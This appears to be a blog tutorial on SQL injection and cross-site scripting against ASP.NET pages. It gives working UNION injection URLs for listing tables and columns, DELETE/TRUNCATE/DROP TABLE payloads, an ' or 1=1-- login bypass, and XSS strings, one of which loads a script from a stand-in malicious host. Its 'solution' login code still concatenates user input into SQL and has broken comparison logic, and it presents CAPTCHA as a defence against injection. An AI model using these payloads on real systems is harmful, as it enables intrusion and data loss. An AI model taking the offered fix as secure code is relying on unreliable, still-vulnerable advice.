SQL
INJECTION and Cross-Site Scripting
Attacks
What is SQL Injection and Cross-Site Scripting
Cross-Site Scripting (XSS or CSS)
·
Enables malicious attackers to inject client-side script (JavaScript) or HTML markup into
web pages viewed by other users.
SQL Injection
·
Insertion of a SQL query via input data from client to
application that is later passed to an instance of SQLServer for parsing and execution.
·
Very common with PHP and Classic ASP applications.
.
The mentioned vulnerabilities can happen via:
1. Query
string
2. Form
input box
TIPS FOR GOOD PROGRAMMING:
Do not rely solely on client-side validation
(JavaScript)
The
attacker can bypass the client-side validation by disabling JavaScript in web browsers. Do not depend
exclusively on JavaScript to search and replace potentially
dangerous HTML statements or SQL Injection keywords.
Make sure to revalidate the user input at the server-side. I know this is a lot
of work, but for the sake of security, we have to do it. In the Add Comments
section, the page uses JavaScript to
check for blank fields. Try to disable JavaScript on
your browser and add the comment again.
Replacing single quotation mark (') with two
single quotation marks ('')
I
saw some web sites mentioning that SQL Injection vulnerability
can be prevented by simply replacing single quotation marks with double
quotation marks. That is not always the case; the attackers will still be able
to inject a table with malicious script or HTML markup without the single
quotation mark. Malicious users can bypass the filter by using a different
character encoding;
Inline Code/tags
There
are several ways to display information from an ASP.NET program. We can display
information in the page using an embedded code block. <% ... %> or using <%=
… %> construction.
Another way is to use the data-binding syntax<%# … %> to
bind the control property values to the data and specify values for retrieving,
updating, deleting, and inserting data. Make sure to apply either the
HttpUtility.HtmlEncode or Server.HtmlEncode methods to encode the form data and
other client requests before displaying it in the web page. This will help
prevent possible Cross-Site Scripting injection attacks.
With ASP.NET 4.0, the new <%: … %> code nugget-syntax will automatically
HTML encode the output before it is rendered.
Query string
1.ATTACk ONE(Query string):
Definition:
Insertion of a SQL query via input data from a client to
an application that is later passed to an instance ofSQL Server for parsing and execution.
UNION SQL Injection
We will use the
UNION statement to mine all the table names in
the database. The two consecutive hyphens "--" indicate the SQL comments.
See below that the comments are in green color, the query statement after the
hyphens will not be evaluated by SQL server.
Lets
start with examples:
1.
select * from
test;
testid name
1 piyush
2 test1
3 test2
4 test3
5 test4
6 test5
Now if you execute this query:
select * from test UNION SELECT NULL FROM INFORMATION_SCHEMA.TABLES--;
It will yield the results "All queries
combined using a UNION, INTERSECT, or EXCEPT operator must have an equal number
of expressions in their target lists." This error message emerges if we
try to run a
UNION, INTERSECT, orEXCEPT query that has not an equal number of expressions in its SELECT list sections. The workaround is to keep adding the NULL expression in the URL until the error message disappears.
So when we fire this query :
NOW SUPPOSE YOU HAVE A PAGE THAT ShoW THE NAME
OF THE PERSON THAT HAS ID=1....SIMPLE SENARIO
http://localhost:1234/TESTAPP/SHOWPERSONDETAILS.aspx?id=1
UNION SELECT NULL,NULL FROM
INFORMATION_SCHEMA.TABLES--
The
error message will disappear if the query has equal number of expressions in
the
UNION query.
Next, try to replace each of the NULL value
with TABLE_NAME. If you get an error message, leave it as NULL.
select * from test where test id=1 UNION
SELECT NULL,NULL
FROM INFORMATION_SCHEMA.TABLES--;
testid name
1 piyush
NULL NULL
Hence WE get the information of the table.NOW
EXECUTE THIS QUERY:
http://localhost:1234/TESTAPP/SHOWPERSONDETAILS.aspx?id=1
UNION SELECT NULL,TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
this query will give you the all database table available
in that schema.
NULL TEST
1 piyush
.Next, we will extract
every column name in the TEST table:
http://localhost:1234/TESTAPP/SHOWPERSONDETAILS.aspx?id=1
UNION SELECT NULL, COLUMN_NAME, NULL, NULL FROM
INFORMATION_SCHEMA.COLUMNS
WHERE TABLE_NAME = 'TEST'--
AND BINGO: we got all columnnames
NULL name
NULL testid
1 piyush
Now it become very easy for the hacker to excute
any scrpt and do variety of operations..
DELETE
the data in the table
http://localhost:1234/TESTAPP/SHOWPERSONDETAILS.aspx?id=1 DELETE FROM TEST WHERE username ='piyush' --
TRUNCATE
the table
http://localhost:1234/TESTAPP/SHOWPERSONDETAILS.aspx?id=1 TRUNCATE TABLE TEST--
DROP the
table
http://localhost:1234/TESTAPP/SHOWPERSONDETAILS.aspx?id=1 DROP TABLE TEST --
SOLUTION:
Preventing SQL Injection
·
SQL injection can be prevented if
you adopt an input validation technique in which user input is authenticated
against a set of defined rules for length, type, and syntax and also against
business rules.
·
You should ensure that users with
the permission to access the database have the least privileges. Additionally,
do not use system administrator accounts like “sa” for Web applications. Also,
you should always make sure that a database user is created only for a specific
application and this user is not able to access other applications. Another
method for preventing SQL injection attacks is to remove all stored procedures
that are not in use.
·
Use strongly typed parameterized
query APIs with placeholder substitution markers, even when calling stored
procedures
·
Show care when using stored
procedures since they are generally safe from injection. However, be careful as
they can be injectable (such as via the use of exec() or concatenating
arguments within the stored procedure).
Forms input:
1.attack one(Forms
input):
We can bypass the login page
by simply adding ' or
1=1 -- or ') or
1=1-- to the login ID and placing any value in the
password field. See example below.
Lets see what happens when this input is taken by
the query and get executed:
Query:
SELECT Loginid,password,username
FROM logintable WHERE
username = 'test@test.com'
or 1=1--' AND PASSWORD='asdasdda'
So you see the
rest of the part(password) gets
commented and the where condition becomes true
BECAUSE OF THE OR OPERATOR.
Thus NOT ONLY
PROVIDING WRONG PASSWORD BUT ASLO WRONG USERNAME THE HACKER/SPAM-BOTS CAN ENTER
INTO THE WEBSITE AS AUTHORIZED USER..................................................................
SOLUTIONS:
1.to prevent
spam/bots to enter the illegal script
USE CAPTCHA TO
ALLOW USER TO ENTER AND GET VALIDATED ..
For more
information on captcha visit article:
CAPTCHA
PROCTECTING ONES OWN .........
2.To prevent user to put illegal script:
Their is no specific code or tool that can be put into the
page and get relieved .I tried this.....................
2.1)First put the restriction on the textbox so that user
cannot enter special characters.
If so (you finds it is necessary)...see Tips and Tricks with jQuery and ASP.NET
Controls (TEXTBOX IN CONTROL)
2.2) then check the username and password retrived from
database with the one entered by the user.
string username = txtUserName.Text;
string password = txtPWD.Text;
DataSet dsUsers = Execute2DataSet("SELECT useranme,password FROM logintable WHERE USERID = '"
+ txtUserName.Text + "' AND PASSWORD='"
+ txtPWD.Text + "'");
string tableusename =
dsUsers.Tables[0].Rows[0]["USERNAME"].ToString();
string tablepassword =
dsUsers.Tables[0].Rows[0]["PASSWORD"].ToString();
if (username.ToUpper() == tableusename||username==tableusename&&password==tablepassword)
{
if
(dsUsers.Tables[0].Rows.Count > 0)
{
//Then go to your page or
do the necessary.........
}
}
else
{
Response.Write("<script>alert('Invalid userid / password.')</script>");
}
2.ATTACK
TWO
Cross-Site Scripting
Cross-Site Scripting enables malicious attackers to inject
client-side script or HTML markup into web pages viewed
by other users. This can happen through the input form. Update the comment with
the string "<scriptsrc="http://localhost:9997/badhost/maliciousscript.js"></script>". You
should see a pop-up message when you navigate to the Login.aspx page.
Update the form value with any of the
strings listed below and observe the outcomes. Make sure the string is in one
line and no line break. If the JavaScript is
executed successfully by the browser or displays unexpected results, then the
web page is subjected to Cross-Site scripting.
·
<BODY ONLOAD=''javascript:window.location="http://www.google.com"''>
·
<BODY ONLOAD="javascript:alert(''XSS'')">
·
<p onmouseover=javascript:window.location="http://www.
google.com";>test
·
<p onmousemove=javascript:window.location="http://www.
google.com";>test
·
<p onMouseDown=javascript:window.location="http://www.google.com";>test
·
<span onmouseover=javascript:window.location="http://www. google.
SOLUTION:
1.to prevent spam/bots
to enter the illegal script
USE CAPTCHA TO
ALLOW USER TO ENTER AND GET VALIDATED ..
For more
information on captcha visit article:
CAPTCHA
PROCTECTING ONES OWN .........
2.To prevent user to put illegal script:
Their is no specific code or tool that can be put into the
page and get relieved .I tried this.....................
2.1)First put the restriction on the textbox so that user
cannot enter special characters.
If so (you finds it is necessary)...see Tips and Tricks with jQuery and ASP.NET
Controls (TEXTBOX IN CONTROL)
No comments :
Post a Comment